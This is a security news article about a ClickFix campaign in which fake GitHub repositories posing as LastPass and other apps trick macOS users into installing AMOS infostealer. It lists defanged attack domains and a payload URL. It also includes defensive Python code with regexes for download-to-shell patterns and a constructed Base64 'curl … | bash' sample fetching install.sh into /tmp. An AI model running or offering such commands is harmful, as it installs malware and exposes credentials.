LastPass Malware Alert: Fake Password Managers Infect macOS Users


Cybercriminals are disguising fake password managers as legitimate apps to deliver LastPass malware through fraudulent GitHub repositories. The attack targets macOS users with ClickFix attacks, tricking them into pasting malicious commands into Terminal. At the center of this campaign is AMOS malware (Atomic Stealer), a dangerous macOS malware designed to steal passwords, banking data, and cryptocurrency wallets. With over 100 popular apps impersonated, including LastPass, 1Password, and Dropbox, this campaign highlights how trusted platforms can be weaponized for large-scale cybercrime.

TL;DR

Hackers are spreading LastPass malware on macOS by disguising fake password managers in fraudulent GitHub repositories. The attack uses ClickFix attacks to trick users into pasting Terminal commands, installing AMOS malware (Atomic Stealer). Over 100 apps, including LastPass and 1Password, are impersonated. The best defense: download only from official sites, avoid unknown commands, and verify app sources.

How the Fake Password Managers Work

Attackers created more than 100 GitHub repositories posing as trusted apps. Some of the impersonated applications include 1Password, LastPass, Dashlane, RoboForm, Keeper, NordPass, Dropbox, Notion, Robinhood, and Adobe After Effects.

These repositories look professional, complete with download buttons that redirect users to malicious domains. Once there, victims are instructed to paste commands into macOS Terminal.

The command runs a Base64-encoded curl request that downloads AMOS malware (install.sh) into the /tmp directory. This gives attackers system access. With recent updates, AMOS malware now includes a backdoor, making it persistent and harder to remove, raising the risk of long-term macOS malware infections.
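A defender can unwrap such a pasted command before it ever reaches a shell. The triage helper below is an added example, not code from LastPass or from the campaign; the sample command, its `example.invalid` host and the `echo … | base64 -d | bash` wrapper are constructed assumptions that only mirror the "Base64-encoded curl into /tmp" pattern described above.

```python
import base64
import re

# Heuristics for a command a web page asks the user to paste into Terminal.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;)]+", re.I)
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b", re.I)
SHELL_SINK = re.compile(r"\|\s*(?:ba|z)?sh\b", re.I)
TMP_PATH = re.compile(r"(?:/private)?/tmp/[\w.\-]+")


def decode_layers(text, max_depth=3):
    """Return the text plus every readable Base64 payload nested inside it."""
    layers, queue = [text], [(text, 0)]
    while queue:
        current, depth = queue.pop()
        if depth >= max_depth:
            continue
        for run in B64_RUN.findall(current):
            try:
                decoded = base64.b64decode(run, validate=True).decode("utf-8")
            except ValueError:  # bad padding, bad alphabet, or not UTF-8
                continue
            if all(ch.isprintable() or ch.isspace() for ch in decoded):
                layers.append(decoded)
                queue.append((decoded, depth + 1))
    return layers


def triage(command):
    """Summarise what the command does once its encoded layers are unwrapped."""
    joined = "\n".join(layers := decode_layers(command))
    return {
        "encoded_layers": len(layers) - 1,
        "urls": sorted(set(URL.findall(joined))),
        "downloader": bool(DOWNLOADER.search(joined)),
        "pipes_to_shell": bool(SHELL_SINK.search(joined)),
        "tmp_paths": sorted(set(TMP_PATH.findall(joined))),
    }


def verdict(report):
    """'high' = download hidden behind encoding; 'review' = plain download-and-run."""
    if report["downloader"] and report["encoded_layers"] > 0:
        return "high"
    if report["downloader"] and (report["pipes_to_shell"] or report["tmp_paths"]):
        return "review"
    return "none"


# Constructed sample, not the campaign's command: placeholder host and file name.
_INNER = "curl -fsSL https://downloads.example.invalid/get/install.sh -o /tmp/install.sh"
SAMPLE_PASTE = 'echo "%s" | base64 -d | bash' % base64.b64encode(_INNER.encode()).decode()
```

Running `triage(SAMPLE_PASTE)` exposes the hidden URL and the `/tmp` drop path without executing anything, which is the information a help desk or EDR rule needs to decide whether to block the paste.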

What Is AMOS Malware?

AMOS malware, short for Atomic Stealer, is a malware-as-a-service offered for around $1,000 per month. It specializes in stealing:

  • Login credentials
  • Browser cookies and autofill data
  • Banking and credit card information
  • Cryptocurrency wallet keys

Since surfacing in April 2023, AMOS has become a staple tool among financially motivated crime groups. The integration of fake password managers into its delivery method has increased its reach significantly among macOS malware campaigns.

ClickFix Attacks on macOS

ClickFix attacks exploit users’ trust in Terminal commands. Once the command is pasted, the script executes silently, dropping AMOS malware onto the device.

These ClickFix attacks are not new. Past campaigns have impersonated Booking.com and fake macOS troubleshooting utilities. Criminals are clearly refining this approach to spread macOS malware more effectively, often combining it with SEO tricks to make malicious GitHub repositories rank high in search results.

Recent Case Study: LastPass Impersonation on GitHub Pages

[Image: screen capture of the LastPass impersonation page. Image courtesy: LastPass]

The LastPass TIME team (Threat Intelligence, Mitigation, and Escalation) recently tracked a wave of GitHub-based attacks impersonating LastPass.

  • On 16 September, a GitHub user named modhopmduck476 created two fake LastPass repositories.
  • These included links labeled “Install LastPass on MacBook.”
  • Clicking redirected victims through:
    • ahoastock825[.]github[.]io/.github/lastpass → then to
    • macprograms-pro[.]com/mac-git-2-download.html
  • That page asked users to paste a Terminal command, which decoded to:
    • bonoud[.]com/get3/install.sh

The script delivered an “Update” payload into the Temp folder, which was actually AMOS malware.

To aid defenders, LastPass published Indicators of Compromise (IoCs), including the malicious GitHub repositories, redirect domains, and payload URLs.
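To put the indicators listed above to work, the sketch below refangs them and sweeps a proxy log for matching hosts and paths. It is an added example, not LastPass tooling; the log format (time, client, URL), the client addresses and the three near-miss hosts at the end of the sample are constructed.

```python
from urllib.parse import urlsplit

# Indicators exactly as the article lists them (defanged).
DEFANGED_IOCS = [
    "ahoastock825[.]github[.]io/.github/lastpass",
    "macprograms-pro[.]com/mac-git-2-download.html",
    "bonoud[.]com/get3/install.sh",
]


def refang(text):
    """Undo the '[.]' defanging so indicators compare equal to logged hosts."""
    return text.replace("[.]", ".")


def load_iocs(defanged):
    """Split each indicator into a (hostname, path) pair."""
    pairs = []
    for item in defanged:
        parts = urlsplit("//" + refang(item))
        pairs.append((parts.hostname, parts.path))
    return pairs


def classify(url, iocs):
    """Return 'host+path', 'host' or None for one logged URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    best = None
    for ioc_host, ioc_path in iocs:
        # Exact host or a subdomain of it; a bare string suffix must not match.
        if host == ioc_host or host.endswith("." + ioc_host):
            if parts.path.startswith(ioc_path):
                return "host+path"
            best = "host"
    return best


def scan(log_lines, iocs):
    """Return (client, match level) for every log line that hits an indicator."""
    hits = []
    for line in log_lines:
        _time, client, url = refang(line).split()
        level = classify(url, iocs)
        if level:
            hits.append((client, level))
    return hits


# Constructed proxy log, kept defanged in source and refanged by scan().
SAMPLE_LOG = [
    "09:14:02 10.0.4.17 https://ahoastock825[.]github[.]io/.github/lastpass",
    "09:14:05 10.0.4.17 https://macprograms-pro[.]com/mac-git-2-download.html",
    "09:14:31 10.0.4.17 https://bonoud[.]com/get3/install.sh",
    "09:20:00 10.0.4.22 https://pages[.]github[.]io/.github/lastpass",
    "09:21:10 10.0.4.22 https://notbonoud[.]com/get3/install.sh",
    "09:22:45 10.0.4.30 https://cdn[.]bonoud[.]com/other",
]
```

A client that hits all three indicators in sequence, as 10.0.4.17 does in the sample, followed the full redirect chain and should be treated as a likely infection rather than a stray click.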

How to Protect macOS from LastPass Malware Attacks

To defend against LastPass malware and related macOS malware threats:

  • Download apps only from official vendor websites, not third-party mirrors or shady GitHub repositories.
  • Avoid running Terminal commands you don’t understand; this is the main trick behind ClickFix attacks.
  • Treat cracked apps and unofficial macOS ports with suspicion; many deliver AMOS malware.
  • Verify whether an app posing as a password manager is legitimate; attackers abuse fake password managers.
  • Be cautious of SEO-promoted search results that redirect to unfamiliar domains.

To Sum Up

The LastPass malware campaign shows how hackers are combining fake password managers, GitHub repositories, and ClickFix attacks to spread AMOS malware on macOS systems. With AMOS evolving into a more persistent macOS malware, the threat level is rising. The solution is simple but vital: stick to official download sources, avoid unknown Terminal commands, and stay alert to suspicious redirects. In a world where even trusted platforms are abused, vigilance is the only effective defense.

FAQs

  1. What is LastPass malware?
    LastPass malware is a malicious campaign that impersonates trusted apps, especially password managers, to spread AMOS malware on macOS devices.
  2. What is AMOS malware?
    AMOS (Atomic Stealer) is a macOS malware-as-a-service sold for $1,000/month. It steals login credentials, browser data, financial details, and crypto wallets.
  3. How do ClickFix attacks work?
    ClickFix attacks trick users into pasting commands into macOS Terminal. These commands silently install malware, including AMOS malware.
  4. Which apps are being impersonated?
    Over 100 apps have been spoofed, including LastPass, 1Password, Dashlane, RoboForm, Keeper, NordPass, Dropbox, Notion, Robinhood, and Adobe After Effects.
  5. How can I protect my Mac from LastPass malware?
    Always download apps from official websites, avoid shady GitHub repositories, and never run unknown Terminal commands. Staying cautious helps prevent infection.

Author

  • Maya Pillai is a technology writer with over 20 years of experience. She specializes in cybersecurity, focusing on ransomware, endpoint protection, and online threats, making complex issues easy to understand for businesses and individuals.
